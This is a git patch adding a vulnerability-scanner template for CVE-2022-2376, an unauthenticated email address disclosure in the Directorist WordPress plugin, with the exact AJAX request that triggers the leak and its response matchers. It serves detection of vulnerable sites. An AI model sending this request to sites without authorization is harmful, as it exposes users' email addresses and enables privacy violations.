From 7edadd9fb271a6b51a83952b5b9f804ff4e6ea20 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Sep 2022 14:27:31 +0530 Subject: [PATCH] Create CVE-2022-2376.yaml --- cves/2022/CVE-2022-2376.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2022/CVE-2022-2376.yaml diff --git a/cves/2022/CVE-2022-2376.yaml b/cves/2022/CVE-2022-2376.yaml new file mode 100644 index 0000000000..82864f427f --- /dev/null +++ b/cves/2022/CVE-2022-2376.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-2376 + +info: + name: Directorist < 7.3.1 - Unauthenticated Email Address Disclosure + author: Random-Robbie + severity: medium + description: The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users + remediation: Fixed in version 7.3.1 + reference: + - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2376 + tags: cve,cve2022,wp-plugin,wpscan,wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'directorist-authors__card__details__top' + - 'directorist-authors__card__info-list' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200